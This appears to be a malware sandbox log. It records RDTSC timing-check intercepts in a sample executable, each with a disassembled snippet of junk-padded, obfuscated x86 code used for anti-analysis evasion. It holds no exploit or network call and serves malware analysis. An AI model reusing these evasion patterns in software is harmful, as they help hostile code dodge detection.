Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A11F second address: B5A125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A125 second address: B5A129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A129 second address: B5A14B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007FC22D01ECD1h 0x00000014 jmp 00007FC22D01ECCBh 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A1EF second address: B5A1FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A1FD second address: B5A20A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A20A second address: B5A229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b nop 0x0000000c mov di, 4BD1h 0x00000010 xchg eax, ebx 0x00000011 jc 00007FC22CC1B8CBh 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FC22CC1B8A6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A229 second address: B5A24C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A24C second address: B5A250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5C30C second address: B5C310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5C310 second address: B5C32A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FC22CC1B8A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5CEA8 second address: B5CEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E4F9 second address: B5E515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22CC1B8B7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E24D second address: B5E25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FC22D01ECC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E25C second address: B5E26A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5E515 second address: B5E590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC22D01ECC8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov esi, ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FC22D01ECC8h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov si, 79B7h 0x00000048 mov edi, ecx 0x0000004a xchg eax, ebx 0x0000004b jng 00007FC22D01ECD5h 0x00000051 jmp 00007FC22D01ECCFh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c je 00007FC22D01ECC6h 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5EDB3 second address: B5EDBD instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5FA16 second address: B5FA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FC22D01ECCCh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5FA32 second address: B5FA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6249C second address: B624AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B624AC second address: B624B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6029E second address: B602A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B629F0 second address: B629F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B63AF9 second address: B63AFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64A48 second address: B64A4E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B63C8A second address: B63C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64A4E second address: B64AB0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8B2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007FC22CC1B8B8h 0x00000011 nop 0x00000012 movsx ebx, ax 0x00000015 push 00000000h 0x00000017 mov ebx, 1AE51155h 0x0000001c push 00000000h 0x0000001e call 00007FC22CC1B8B8h 0x00000023 mov dword ptr [ebp+12465916h], ebx 0x00000029 pop ebx 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64AB0 second address: B64AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64AB4 second address: B64ABE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B64ABE second address: B64AC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B65D02 second address: B65D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B65D07 second address: B65D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B67BD9 second address: B67BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68D3F second address: B68D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68D45 second address: B68D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68D49 second address: B68DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2593h], esi 0x00000011 push 00000000h 0x00000013 sub dword ptr [ebp+122D37FAh], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FC22D01ECC8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov bx, 2D10h 0x00000039 xchg eax, esi 0x0000003a jmp 00007FC22D01ECD8h 0x0000003f push eax 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B69F03 second address: B69F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC22CC1B8AAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FAE second address: B68FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FB4 second address: B68FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22CC1B8ACh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FCB second address: B68FCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B68FCF second address: B68FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AF57 second address: B6AF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AF5D second address: B6AF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AF61 second address: B6AFCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+122D2008h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FC22D01ECC8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d pushad 0x0000002e js 00007FC22D01ECC8h 0x00000034 mov bl, A4h 0x00000036 mov dword ptr [ebp+122D27BAh], eax 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FC22D01ECC8h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6AFCA second address: B6AFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6C105 second address: B6C176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC22D01ECC8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 jnc 00007FC22D01ECD4h 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FC22D01ECC8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push 00000000h 0x00000033 mov edi, 49C10FD6h 0x00000038 push 00000000h 0x0000003a call 00007FC22D01ECD5h 0x0000003f mov dword ptr [ebp+122D1F5Dh], edi 0x00000045 pop ebx 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a ja 00007FC22D01ECC6h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6C176 second address: B6C1A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC22CC1B8A8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 js 00007FC22CC1B8D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC22CC1B8B4h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6D12F second address: B6D17A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c movsx edi, dx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FC22D01ECC8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b add dword ptr [ebp+122DBBADh], esi 0x00000031 push 00000000h 0x00000033 pushad 0x00000034 mov di, 1C52h 0x00000038 mov dx, di 0x0000003b popad 0x0000003c push eax 0x0000003d jnp 00007FC22D01ECD0h 0x00000043 pushad 0x00000044 pushad 0x00000045 popad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E1FA second address: B6E1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E1FE second address: B6E259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC22D01ECCFh 0x0000000e popad 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D295Bh], eax 0x00000016 push 00000000h 0x00000018 xor bx, CA00h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FC22D01ECC8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 sub dword ptr [ebp+122DBB93h], ecx 0x0000003f xchg eax, esi 0x00000040 push edi 0x00000041 push eax 0x00000042 push edx 0x00000043 jng 00007FC22D01ECC6h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E407 second address: B6E429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FC22CC1B8B1h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6E429 second address: B6E491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sub dword ptr [ebp+124579F1h], edi 0x0000000d push dword ptr fs:[00000000h] 0x00000014 pushad 0x00000015 jmp 00007FC22D01ECD3h 0x0000001a jne 00007FC22D01ECCCh 0x00000020 popad 0x00000021 and bx, A100h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d mov dword ptr [ebp+122D25A2h], eax 0x00000033 mov eax, dword ptr [ebp+122D1245h] 0x00000039 sub dword ptr [ebp+122D38FCh], ecx 0x0000003f push FFFFFFFFh 0x00000041 jmp 00007FC22D01ECCCh 0x00000046 mov ebx, esi 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7039B second address: B703A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B703A5 second address: B70413 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D2EBBh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c pushad 0x0000001d movzx eax, dx 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FC22D01ECC8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov ebx, ecx 0x00000047 jp 00007FC22D01ECCBh 0x0000004d sub bx, F935h 0x00000052 mov eax, dword ptr [ebp+122D0009h] 0x00000058 mov dword ptr [ebp+122D2135h], edi 0x0000005e push FFFFFFFFh 0x00000060 add bx, 9145h 0x00000065 nop 0x00000066 pushad 0x00000067 push edi 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B70413 second address: B70435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FC22CC1B8A8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC22CC1B8B1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B721B7 second address: B721BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B16254 second address: B1625A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B1625A second address: B16282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007FC22D01ECDCh 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC22D01ECD4h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7A6CA second address: B7A6D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7A6D8 second address: B7A6DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7D6DB second address: B7D726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pushad 0x0000000e jmp 00007FC22CC1B8B3h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007FC22CC1B8B2h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC22CC1B8B3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7D726 second address: B7D72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7D868 second address: B7D87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FC22CC1B8AEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DA5B second address: B7DA72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22D01ECCCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DA72 second address: B7DA7C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22CC1B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DA7C second address: B7DA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DBBE second address: B7DBC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B7DBC2 second address: B7DBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B802B0 second address: B802B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B802B4 second address: B802BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B802BD second address: B802C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B11231 second address: B11242 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC22D01ECCCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8369F second address: B836A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B836A5 second address: B836A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
